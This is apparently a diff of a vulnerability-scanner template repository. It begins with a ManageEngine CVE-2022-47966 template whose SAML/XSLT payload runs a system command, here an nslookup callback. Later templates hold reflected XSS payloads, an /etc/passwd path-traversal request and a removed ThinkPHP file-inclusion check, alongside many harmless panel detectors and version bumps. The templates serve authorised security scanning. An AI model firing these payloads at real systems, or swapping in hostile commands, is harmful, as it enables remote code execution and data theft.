- https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/
- https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-47966
classification:
cve-id: CVE-2022-47966
metadata:
shodan-query: title:"ManageEngine"
verified: "true"
tags: cve,cve2022,rce,zoho,manageengine,oast
variables:
cmd: 'nslookup {{interactsh-url}}'
SAMLResponse: '<?xml version="1.0" encoding="UTF-8"?> <samlp:Response ID="_eddc1e5f-8c87-4e55-8309-c6d69d6c2adf" InResponseTo="_4b05e414c4f37e41789b6ef1bdaaa9ff" IssueInstant="2023-01-16T13:56:46.514Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <Assertion ID="_b5a2e9aa-8955-4ac6-94f5-334047882600" IssueInstant="2023-01-16T13:56:46.498Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"> <Issuer>a</Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_b5a2e9aa-8955-4ac6-94f5-334047882600"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"> <xsl:stylesheet version="1.0" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:variable name="rtobject" select="rt:getRuntime()"/> <xsl:variable name="process" select="rt:exec($rtobject,&quot;{{cmd}}&quot;)"/> <xsl:variable name="processString" select="ob:toString($process)"/> <xsl:value-of select="$processString"/> </xsl:template> </xsl:stylesheet> </ds:Transform> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw==</ds:SignatureValue> <ds:KeyInfo/> </ds:Signature> </Assertion> </samlp:Response>'
requests:
- raw:
- |
POST /SamlResponseServlet HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "dns"
- type: word
part: body
words:
- "Unknown error occurred while processing your request"
- type: status
status:
- 500

6
default-logins/nagios/nagios-default-login.yaml
View File

@ -36,6 +36,12 @@ requests:
- 200
- type: word
part: header
words:
- 'text/html'
- type: word
part: body
words:
- 'Current Status'
- 'Reports'

4
exposed-panels/axigen-webadmin.yaml
View File

@ -10,7 +10,7 @@ info:
classification:
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Axigen WebAdmin"
shodan-query: http.title:"Axigen WebAdmin"
tags: axigen,panel
requests:
@ -22,7 +22,7 @@ requests:
matchers:
- type: word
words:
- '<title>Axigen WebAdmin</title>'
- '<title>Axigen WebAdmin</title>'
- type: status
status:

33
exposed-panels/connect-box-login.yaml Normal file
View File

@ -0,0 +1,33 @@
id: connectbox-panel
info:
name: Connect Box Login Panel Detect
author: fabaff
severity: info
metadata:
verified: true
shodan-query: 'NET-DK/1.0'
tags: panel,connectbox,iot
requests:
- method: GET
path:
- '{{BaseURL}}'
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: header
words:
- "NET-DK/1.0"
- type: regex
part: header
regex:
- "../common_page/(.*).html"
- type: status
status:
- 302

26
exposed-panels/esphome-panel.yaml Normal file
View File

@ -0,0 +1,26 @@
id: esphome-panel
info:
name: ESPHome Panel Detect
author: fabaff
severity: info
metadata:
verified: true
shodan-query: title:"Login - ESPHome"
tags: panel,esphome,iot
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'class="esphome-header'
- type: status
status:
- 200

30
exposed-panels/machform-admin-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: machform-admin-panel
info:
name: MachForm Admin Panel
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: title:"MachForm Admin Panel"
tags: panel,machform,admin
requests:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'alt="MachForm"'
- '<title>MachForm Admin Panel</title>'
condition: or
- type: status
status:
- 200

30
exposed-panels/mylittleadmin-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: mylittleadmin-panel
info:
name: myLittleAdmin Panel
author: nullfuzz
severity: info
description: |
myLittleAdmin is a third-party tool that you can use to manipulate MS SQL databases.
reference:
- http://mylittleadmin.com/en/overview.aspx
metadata:
verified: true
shodan-query: http.html:"myLittleAdmin"
tags: panel,mylittleadmin,login
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/mylittleadmin/"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '<title>myLittleAdmin for SQL Server')"
condition: and

37
exposed-panels/mylittlebackup-panel.yaml Normal file
View File

@ -0,0 +1,37 @@
id: mylittlebackup-panel
info:
name: MyLittleBackup Panel
author: nullfuzz
severity: info
description: |
myLittleBackup is a third-party tool that you can use to manipulate Backup SQL databases.
reference:
- http://www.mylittlebackup.com/mlb/en/overview.aspx
metadata:
verified: true
shodan-query: http.html:"myLittleBackup"
tags: panel,mylittlebackup
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/mlb/"
- "{{BaseURL}}/mylittlebackup/"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'content=".*(myLittleBackup).*'
- '<title>myLittleBackup for SQL Server'
condition: or
- type: status
status:
- 200

30
exposed-panels/sap-cloud-analytics.yaml Normal file
View File

@ -0,0 +1,30 @@
id: sap-cloud-analytics
info:
name: SAP Analytics Cloud
author: righettod
severity: info
metadata:
verified: "true"
shodan-query: http.html:"SAP Analytics Cloud"
tags: panel,sap,cloudanalytics
requests:
- method: GET
path:
- '{{BaseURL}}'
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'SAP Analytics Cloud'
- '/approuter/'
condition: and
- type: status
status:
- 200

32
exposed-panels/sap-successfactors-detect.yaml Normal file
View File

@ -0,0 +1,32 @@
id: sap-successfactors-detect
info:
name: SAP SuccessFactors Detect
author: tess
severity: info
metadata:
verified: "true"
shodan-dork: title:"Login - SAP SuccessFactors"
tags: sap,detect
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/sf/start'
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'SAP SuccessFactors'
- 'sap-ui-core'
condition: and
- type: status
status:
- 200

30
exposed-panels/sqlbuddy-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: sqlbuddy-panel
info:
name: SQL Buddy Panel
author: nullfuzz
severity: info
description: |
SQL Buddy is a third-party tool that you can use to MySQL administration.
reference:
- http://sqlbuddy.com/
metadata:
verified: true
shodan-query: http.title:"SQL Buddy"
tags: panel,sqlbuddy
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/sqlbuddy/"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, '<title>SQL Buddy')"
condition: and

29
exposed-panels/tooljet-panel.yaml Normal file
View File

@ -0,0 +1,29 @@
id: tooljet-panel
info:
name: ToolJet Panel
author: DhiyaneshDk
severity: info
metadata:
verified: true
shodan-query: title:"ToolJet - Dashboard"
tags: panel,tooljet
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/login?redirectTo=/"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- "ToolJet - Dashboard"
- type: status
status:
- 200

14
exposures/apis/openapi.yaml
View File

@ -2,7 +2,7 @@ id: openapi
info:
name: OpenAPI
author: pdteam
author: pdteam,ynnirc
severity: info
tags: exposure,api
@ -13,17 +13,19 @@ requests:
matchers-condition: and
matchers:
- type: word
words:
- application/openapi+json
part: header
- type: word
words:
- openapi
- paths
condition: and
- type: word
part: header
words:
- application/openapi+json
- application/json
condition: or
- type: status
status:
- 200

38
exposures/backups/froxlor-database-backup.yaml Normal file
View File

@ -0,0 +1,38 @@
id: froxlor-database-backup
info:
name: Froxlor Database Backup File Disclosure
author: tess
severity: medium
metadata:
verified: true
shodan-dork: title:"Froxlor Server Management Panel"
tags: froxlor,backup,exposure,disclosure
requests:
- method: GET
path:
- '{{BaseURL}}/install/froxlor.sql'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DROP TABLE IF EXISTS"
- "CREATE TABLE"
- "PRIMARY KEY"
condition: and
- type: word
part: header
words:
- "application/sql"
- "application/x-sql"
- "application/octet-stream"
- "text/plain"
condition: or
- type: status
status:
- 200

3
exposures/logs/error-logs.yaml
View File

@ -51,11 +51,14 @@ requests:
- "Array"
- "Exception"
- "Fatal"
- "FastCGI sent in stderr"
condition: or
- type: word
condition: or
words:
- text/plain
- application/octet-stream
part: header
- type: status

28
exposures/tokens/amazon/aws-access-secret-key.yaml Normal file
View File

@ -0,0 +1,28 @@
id: aws-access-secret-key
info:
name: AWS Access/Secret Key Disclosure
author: tess
severity: unknown
metadata:
verified: "true"
tags: disclosure,aws,generic,exposure,amazon
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'accessKeyId'
- 'secretAccessKey'
condition: and
case-insensitive: true
- type: status
status:
- 200

26
file/android/deep-link-detect.yaml Normal file
View File

@ -0,0 +1,26 @@
id: deep-link-detect
info:
name: Deep Link Detection
author: Hardik-Solanki
severity: info
reference:
- https://developer.android.com/training/app-links/deep-linking
- https://www.geeksforgeeks.org/deep-linking-in-android-with-example/
- https://medium.com/@muratcanbur/intro-to-deep-linking-on-android-1b9fe9e38abd
metadata:
verified: "true"
tags: android,file,deeplink
file:
- extensions:
- xml
matchers-condition: and
matchers:
- type: word
words:
- "android:scheme"
- "android:host"
- "android:name"
condition: and

2
helpers/wordpress/plugins/advanced-custom-fields.txt
View File

@ -1 +1 @@
6.0.6
6.0.7

2
helpers/wordpress/plugins/all-in-one-wp-migration.txt
View File

@ -1 +1 @@
7.69
7.70

2
helpers/wordpress/plugins/astra-sites.txt
View File

@ -1 +1 @@
3.1.22
3.1.23

2
helpers/wordpress/plugins/autoptimize.txt
View File

@ -1 +1 @@
3.1.4
3.1.5

2
helpers/wordpress/plugins/complianz-gdpr.txt
View File

@ -1 +1 @@
6.3.9
6.4.0

2
helpers/wordpress/plugins/cookie-notice.txt
View File

@ -1 +1 @@
2.4.4
2.4.5

2
helpers/wordpress/plugins/custom-css-js.txt
View File

@ -1 +1 @@
3.41
3.42

2
helpers/wordpress/plugins/elementor.txt
View File

@ -1 +1 @@
3.10.0
3.10.1

2
helpers/wordpress/plugins/elementskit-lite.txt
View File

@ -1 +1 @@
2.8.0
2.8.1

2
helpers/wordpress/plugins/google-listings-and-ads.txt
View File

@ -1 +1 @@
2.3.6
2.3.7

2
helpers/wordpress/plugins/google-site-kit.txt
View File

@ -1 +1 @@
1.90.1
1.92.0

2
helpers/wordpress/plugins/gutenberg.txt
View File

@ -1 +1 @@
14.9.1
15.0.0

2
helpers/wordpress/plugins/jetpack.txt
View File

@ -1 +1 @@
11.7
11.7.1

2
helpers/wordpress/plugins/leadin.txt
View File

@ -1 +1 @@
10.0.10
10.0.16

2
helpers/wordpress/plugins/limit-login-attempts-reloaded.txt
View File

@ -1 +1 @@
2.25.10
2.25.11

2
helpers/wordpress/plugins/mailpoet.txt
View File

@ -1 +1 @@
4.4.0
4.5.0

2
helpers/wordpress/plugins/nextgen-gallery.txt
View File

@ -1 +1 @@
3.32
3.33

2
helpers/wordpress/plugins/ninja-forms.txt
View File

@ -1 +1 @@
3.6.15
3.6.16

2
helpers/wordpress/plugins/optinmonster.txt
View File

@ -1 +1 @@
2.11.1
2.11.2

2
helpers/wordpress/plugins/pixelyoursite.txt
View File

@ -1 +1 @@
9.3.0
9.3.1

2
helpers/wordpress/plugins/redirection.txt
View File

@ -1 +1 @@
5.3.6
5.3.8

2
helpers/wordpress/plugins/redux-framework.txt
View File

@ -1 +1 @@
4.3.21
4.3.24

2
helpers/wordpress/plugins/siteorigin-panels.txt
View File

@ -1 +1 @@
2.20.3
2.20.4

2
helpers/wordpress/plugins/tablepress.txt
View File

@ -1 +1 @@
2.0.3
2.0.4

2
helpers/wordpress/plugins/the-events-calendar.txt
View File

@ -1 +1 @@
6.0.6.2
6.0.7.1

2
helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
View File

@ -1 +1 @@
2.3.0
2.3.1

2
helpers/wordpress/plugins/w3-total-cache.txt
View File

@ -1 +1 @@
2.2.11
2.2.12

2
helpers/wordpress/plugins/webp-converter-for-media.txt
View File

@ -1 +1 @@
5.6.3
5.6.4

2
helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt
View File

@ -1 +1 @@
3.2.6
3.3.0

2
helpers/wordpress/plugins/woocommerce-services.txt
View File

@ -1 +1 @@
2.1.1
2.2.0

2
helpers/wordpress/plugins/wp-migrate-db.txt
View File

@ -1 +1 @@
2.5.0
2.6.0

2
helpers/wordpress/plugins/wp-user-avatar.txt
View File

@ -1 +1 @@
4.5.4
4.5.5

26
iot/snapdrop-detect.yaml Normal file
View File

@ -0,0 +1,26 @@
id: snapdrop-detect
info:
name: Snapdrop Detect
author: tess
severity: info
metadata:
verified: "true"
shodan-dork: http.title:"Snapdrop"
tags: iot,snapdrop
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'content="Snapdrop"'
- type: status
status:
- 200

3
miscellaneous/dir-listing.yaml
View File

@ -2,7 +2,7 @@ id: dir-listing
info:
name: Directory listing enabled
author: _harleo,pentest_swissky
author: _harleo,pentest_swissky,hczdmr
severity: info
reference:
- https://portswigger.net/kb/issues/00600100_directory-listing
@ -22,6 +22,7 @@ requests:
- "[To Parent Directory]"
- "Directory: /"
condition: or
case-insensitive: true
- type: regex
part: body

2
misconfiguration/akamai/akamai-s3-cache-poisoning.yaml
View File

@ -5,7 +5,7 @@ info:
author: DhiyaneshDk
severity: high
reference:
- https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
- https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
- https://owasp.org/www-community/attacks/Cache_Poisoning
metadata:
verified: "true"

28
misconfiguration/apache/kafka-manager-unauth.yaml Normal file
View File

@ -0,0 +1,28 @@
id: kafka-manager-unauth
info:
name: Kafka Manager Panel - Unauthorized Access
author: Paper-Pen
severity: low
description: A kafka manager unauthorized access was discovered.
reference:
- https://github.com/yahoo/CMAK
metadata:
fofa-query: app="Kafka-Manager"
tags: misconfig,apache,kafka,unauth,exposure
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Kafka Manager</title>"
- type: status
status:
- 200

28
misconfiguration/esphome-dashboard.yaml Normal file
View File

@ -0,0 +1,28 @@
id: esphome-dashboard
info:
name: ESPHome Dashboard Exposure
author: ritikchaddha
severity: medium
description: |
ESPHome Dashboard exposes the secrets like wifi password,api keys and internal logs, it also allows users to make changes through the dashboard.
metadata:
verified: true
shodan-query: title:"Dashboard - ESPHome"
tags: misconfig,esphome,exposure,iot
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Dashboard - ESPHome'
- type: status
status:
- 200

2
misconfiguration/mobiproxy-dashboard.yaml
View File

@ -7,7 +7,7 @@ info:
metadata:
verified: true
shodan-query: http.title:"MobiProxy"
tags: dashboard,exposure,mobiproxy
tags: dashboard,exposure,mobiproxy,misconfig
requests:
- method: GET

34
misconfiguration/unauth-ldap-account-manager.yaml Normal file
View File

@ -0,0 +1,34 @@
id: unauth-ldap-account-manager
info:
name: Unauthenticated LDAP Account Manager
author: tess
severity: medium
metadata:
verified: "true"
shodan-dork: http.title:"LDAP Account Manager"
tags: ldap,misconfig,unauth
requests:
- method: GET
path:
- '{{BaseURL}}/templates/config/profmanage.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'LDAP Account Manager'
- 'Profile management'
- 'Add profile'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

9
exposed-panels/kafka-manager-panel.yaml → technologies/apache/kafka-manager-panel.yaml
View File

@ -2,14 +2,15 @@ id: kafka-manager-panel
info:
name: Kafka Manager Panel
author: Paper-Pen
severity: low
description: A kafka manager unauthorized access was discovered.
author: ritikchaddha
severity: info
reference:
- https://github.com/yahoo/CMAK
metadata:
verified: true
fofa-query: app="Kafka-Manager"
tags: tech,kafka
shodan-query: title:"Kafka-Manager"
tags: tech,kafka,apache
requests:
- method: GET

13
technologies/fingerprinthub-web-fingerprints.yaml
View File

@ -12873,6 +12873,13 @@ requests:
words:
- welcome to nginx on ubuntu!
- type: word
name: openeuler
words:
- <title>Test Page for the Apache HTTP Server on openEuler Linux</title>
- <title>Test Page for the Nginx HTTP Server on openEuler</title>
condition: or
- type: word
name: ucap-search-
words:
@ -15095,4 +15102,10 @@ requests:
words:
- "Server: OpenBSD httpd"
- type: word
name: Hunchentoot
part: header
words:
- "Server: Hunchentoot"
# Enhanced by cs on 2022/02/08

32
technologies/lucy-admin-panel.yaml Normal file
View File

@ -0,0 +1,32 @@
id: lucy-admin-panel
info:
name: Lucy Security Admin Panel
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: html:'title="Lucy'
tags: tech,lucy
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/admin/login"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'title="Lucy"'
- 'aria-label="Lucy'
condition: or
- type: status
status:
- 200

22
technologies/rsshub-detect.yaml Normal file
View File

@ -0,0 +1,22 @@
id: rsshub-detect
info:
name: RSSHub Detect
author: ritikchaddha
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:-1893514038
tags: tech,rsshub
requests:
- method: GET
path:
- "{{BaseURL}}/favicon.ico"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "('-1893514038' == mmh3(base64_py(body)))"

18
technologies/tech-detect.yaml
View File

@ -3675,3 +3675,21 @@ requests:
part: header
words:
- "X-Powered-By: Sails"
- type: word
name: tengine
part: server
words:
- "Tengine"
- type: word
name: tornado
part: header
words:
- "TornadoServer/"
- type: word
name: uvicorn
part: server
words:
- "uvicorn"

2
technologies/wordpress/plugins/elementskit-lite.yaml
View File

@ -1,7 +1,7 @@
id: wordpress-elementskit-lite
info:
name: ElementsKit Elementor addons Detection
name: ElementsKit Elementor Addons and Templates Library Detection
author: ricardomaia
severity: info
reference:

28
technologies/xerox-workcentre-detect.yaml Normal file
View File

@ -0,0 +1,28 @@
id: xerox-workcentre-detect
info:
name: Xerox Workcentre Detect
author: pussycat0x
severity: info
metadata:
verified: true
shodan-query: title:"XEROX WORKCENTRE"
tags: tech,xerox,workcentre
requests:
- method: GET
path:
- "{{BaseURL}}/index.dhtml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "XEROX WORKCENTRE"
- "/header.php?tab=status"
condition: and
- type: status
status:
- 200

35
vulnerabilities/froxlor-xss.yaml Normal file
View File

@ -0,0 +1,35 @@
id: froxlor-xss
info:
name: Froxlor Server Management - Cross Site Scripting
author: tess
severity: medium
description: |
The user must click the forgot password link in order to execute this XSS.
metadata:
verified: true
shodan-dork: title:"Froxlor Server Management Panel"
tags: froxlor,xss
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "javascript&colon;alert(document.domain);dd&sol;&sol;"
- "Froxlor"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

38
vulnerabilities/other/academy-lms-xss.yaml Normal file
View File

@ -0,0 +1,38 @@
id: academy-lms-xss
info:
name: Academy LMS 5.11 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
Academy Learning Management System contains a reflected cross-site scripting vulnerability via the Search parameter.
reference:
- https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
- https://vulners.com/packetstorm/PACKETSTORM:170514
metadata:
verified: "true"
shodan-query: http.html:"Academy LMS"
tags: packetstorm,lms,academy,xss
requests:
- method: GET
path:
- "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'Academy LMS'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

36
vulnerabilities/other/slims-xss.yaml Normal file
View File

@ -0,0 +1,36 @@
id: slims-xss
info:
name: Senayan Library Management System v9.4.0(SLIMS 9) - Cross Site Scripting
author: arafatansari
severity: medium
description: |
SLIMS 9 was discovered to contain `destination` request parameter that copies the value of an HTML tag attribute which is encapsulated in double quotation marks.
reference:
- https://packetstormsecurity.com/files/170182/Senayan-Library-Management-System-9.4.0-Cross-Site-Scripting.html
metadata:
verified: "true"
shodan-query: http.html:"SLIMS"
tags: xss,slims,senayan
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&destination=zbuip%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&logMeIn=Login&memberID=admin&memberPassWord=password&p=member"
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain)</script>'
- 'SLiMS'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

30
vulnerabilities/other/sound4-file-disclosure.yaml Normal file
View File

@ -0,0 +1,30 @@
id: sound4-file-disclosure
info:
name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
author: arafatansari
severity: medium
description: |
The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
reference:
- https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php
metadata:
shodan-query: http.html:"SOUND4"
verified: "true"
tags: packetstorm,lfi,sound4,unauth,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

39
vulnerabilities/other/tikiwiki-xss.yaml Normal file
View File

@ -0,0 +1,39 @@
id: tikiwiki-xss
info:
name: Tiki Wiki CMS Groupware v25.0 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.
reference:
- https://packetstormsecurity.com/files/170446/Tiki-Wiki-CMS-Groupware-25.0-Cross-Site-Scripting.html
metadata:
shodan-query: http.html:"tiki wiki"
verified: "true"
tags: edb,xss,tikiwiki,packetstorm,acketstorm
requests:
- method: GET
path:
- "{{BaseURL}}/tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"
- "{{BaseURL}}/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'Tiki Wiki CMS'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 403

41
vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml
View File

@ -1,41 +0,0 @@
id: thinkphp6-lang-lfi
info:
name: Thinkphp Lang - Local File Inclusion
author: kagamigawa
severity: high
description: |
Thinkphp Lang 6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 is vulnerable to local file inclusion.
reference:
- https://tttang.com/archive/1865/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
verified: true
shodan-query: title:"Thinkphp"
fofa-query: header="think_lang"
tags: thinkphp,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?lang=../../thinkphp/base"
- "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Call Stack'
- 'class="trace'
condition: and
- type: status
status:
- 500
# Enhanced by mp on 2023/01/15

32
‎‎misconfiguration/sound4-directory-listing.yaml Normal file
View File

@ -0,0 +1,32 @@
id: sound4-directory-listing
info:
name: SOUND4 Impact/Pulse/First/Eco <=2.x - Information Disclosure
author: arafatansari
severity: medium
description: |
The application is vulnerable to sensitive directory indexing / information disclosure vulnerability. An unauthenticated attacker can visit the log directory and disclose the server's log files containing sensitive and system information.
reference:
- https://packetstormsecurity.com/files/170259/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Information-Disclosure.html
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5732.php
metadata:
verified: true
shodan-query: http.html:"SOUND4"
tags: misconfig,listing,sound4,disclosure,packetstorm
requests:
- method: GET
path:
- "{{BaseURL}}/log/"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Index of /log</title>"
- "Parent Directory"
condition: and
- type: status
status:
- 200